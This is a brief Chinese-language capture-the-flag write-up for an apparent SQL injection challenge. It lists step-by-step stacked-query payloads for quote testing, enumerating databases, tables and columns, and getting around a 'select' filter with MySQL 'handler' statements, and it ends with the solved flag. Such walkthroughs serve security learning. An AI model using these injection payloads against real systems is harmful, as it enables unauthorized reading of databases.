1、来到题目连接页面

2、测试单引号和双引号，单引号报错，双引号没报错

1'

1"

3、使用万能句式

4、使用堆叠注入测试，查看数据库名

1';show databases;# 

5、查看表名

1';show tables;#

6、查看FlagHere中字段名

1';show columns from FlagHere;# 

 7、查看flag字段中的信息,select被过滤了

1';select flag from FlagHere;#

 

8、使用handler打开表，并读取表中第一个信息

1';handler FlagHere open;handler FlagHere read first; handler FlagHere close;#

 

9、

flag{f89fb3d9-fce7-4c96-9e8e-60d3053acc24}